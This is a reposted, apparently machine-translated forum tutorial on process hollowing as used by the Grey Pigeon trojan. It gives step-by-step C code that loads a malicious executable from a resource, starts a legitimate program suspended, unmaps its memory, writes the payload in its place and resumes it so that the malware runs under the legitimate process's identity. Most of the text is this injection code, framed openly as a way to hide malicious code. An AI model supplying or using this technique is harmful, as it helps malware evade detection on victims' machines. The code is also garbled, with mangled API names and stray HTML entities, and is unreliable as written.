Process replacement (grey pigeon) (Turn)

The process substitution in this article refers to replacing the memory space of a running program with malicious code. If the process being replaced is a legitimate process, then malicious code can do bad things in a legitimate coat. Of course, the bad work is much more or will be found.

The procedure for replacing is as follows:
1. Create a pending state (SUSPEND) process, at which time the main thread of the process has not yet started running.
2. Read the context of the main thread and read the base address of the newly created process.
3. Use Ntunmapviewofsection to free up the memory space of the newly created process and then start populating the malicious code.
4. Set the context of the main thread to start the main thread.

I. I use malicious code as a resource file, so load the resource file into memory first.

Code:

   lpvoid extractres (hmodule hmodule)   {    HRSRC  hresinfo;    hglobal hresdata;    lpvoid lpreslock;     DWORD dwSize;    LPVOID lpAddr;     Hresinfo = findresource (Hmodule, makeintresource (101),  _t ("MALWARE"));     hresdata = loadresource (Hmodule, hresinfo);    lpreslock =  Lockresource (Hresdata);     dwsize = sizeofresource (HModule, hResInfo);     lpaddr = virtualalloc (0, dwsize, mem_commit | mem_ Reserve, page_readwrite);     memcpy (lpaddr, lpreslock, dwsize);     return lpaddr;  } 

Two. At this point lpaddr points to the base address of the malicious code, and the size is dwsize. Creates a pending state of the process, specified with create_suspended.

Code:

Startupinfo si;  Process_information Pi;  ZeroMemory (&si, sizeof (SI));  SI.CB = sizeof (SI);  ZeroMemory (&pi, sizeof (PI)); if (CreateProcess (cappname, NULL, NULL, NULL, FALSE, create_suspended, NULL, NULL, &SI, &pi) = = 0) {return  -1; }

Three. Read the context of the main thread for use when the recovery thread starts. At this point, you need to read the base address of the newly created process for the ntunmapviewofsection function.
Method of Reading Base address: At this point the EBX in the context is a pointer to PEB, and the base address is stored where the PEB offset is 8. Because PEB is in the memory space of the newly created process, it needs to be read using ReadProcessMemory.

Code:

Context context; Context.  Contextflags = Context_full;  if (GetThreadContext (pi.hthread, &context) = = 0) {return-1; }//EBX points to PEB, offset 8 are the pointer to the base address if (ReadProcessMemory (pi.hprocess, (lpcvoid) (context .  EBX + 8), &dwvictimbaseaddr, sizeof (PVOID), NULL) = = 0) {return-1; }

Four. Use the Ntunmapviewofsection function to free up memory space, and then request a space in that space to store malicious code.
The base address is pntheaders->optionalheader.imagebase, and the size is pntheaders->optionalheader.sizeofimage.

Code:

  typedef ULONG  (winapi *pfnntunmapviewofsection)   (Handle processhandle,  pvoid baseaddress);   hmodule hntmodule = getmodulehandle (_T ("Ntdll.dll"));   if  (hntmodule == null)   {    hNtModule =  LoadLibrary (_t ("Ntdll.dll"));    if  (hntmodule == null)      {      return -1;    }  }   pfnntunmapviewofsection pfnntunmapviewofsection =  (pfnntunmapviewofsection) GetProcAddress ( hntmodule,  "Ntunmapviewofsection");  if  (pfnntunmapviewofsection == null)    {    return -1;  }  pfnntunmapviewofsection (Pi.hProcess,   (PVOID) dwvictimbaseaddr);     lpnewvictimbaseaddr = virtualallocex ( pi.hprocess,             (LPVOID) pntheaders->optionalheader.imagebase,             pNtHeaders->OptionalHeader.SizeOfImage,             MEM_COMMIT | MEM_RESERVE,             page_execute_readwrite);

Five. Write malicious code to the newly requested space.

Code:

  // replace headers  writeprocessmemory (PI.HPROCESS,&NBSP;LPNEWVICTIMBASEADDR,  lpmalwarebaseaddr, pntheaders->optionalheader.sizeofheaders, null);  //  replace each sections  lpvoid lpsectionbaseaddr =  (LPVOID) (DWORD) Lpmalwarebaseaddr + pdosheader->e_lfanew + sizeof (Image_nt_headers));   PIMAGE _section_header psectionheader;  for  (idx = 0; idx <  PNTHEADERS-&GT;FILEHEADER.NUMBEROFSECTIONS;&NBSP;++IDX)   {    psectionheader  =  (Pimage_section_header) lpsectionbaseaddr;    writeprocessmemory (pi.hProcess,        (LPVOID) (DWORD) lpnewvictimbaseaddr + psectionheader-> virtualaddress),       (lpcvoid) (DWORD) lpmalwarebaseaddr +  Psectionheader->pointertorawdata),    &Nbsp;  psectionheader->sizeofrawdata,      null);     lpSectionBaseAddr =  (LPVOID) ((DWORD) lpsectionbaseaddr + sizeof (Image_section_header) );  }  // replace the base address in the peb   DWORD dwImageBase = pNtHeaders->OptionalHeader.ImageBase;   WriteProcessMemory (pi.hprocess,  (LPVOID) (context. ebx + 8),  (lpcvoid) &dwimagebase, sizeof (PVOID),  null);

Six. Set the context and start the main thread. It is important to note that the entry point of the program is placed in the EAX register.

Code:

Replace Entry Point Address context.  Eax = Dwimagebase + pntheaders->optionalheader.addressofentrypoint;  SetThreadContext (Pi.hthread, &context); ResumeThread (Pi.hthread);

Seven. At this point, the malicious code begins execution. * Reprint please specify from See Snow forum @pediy.com

Process replacement (grey pigeon) (Turn)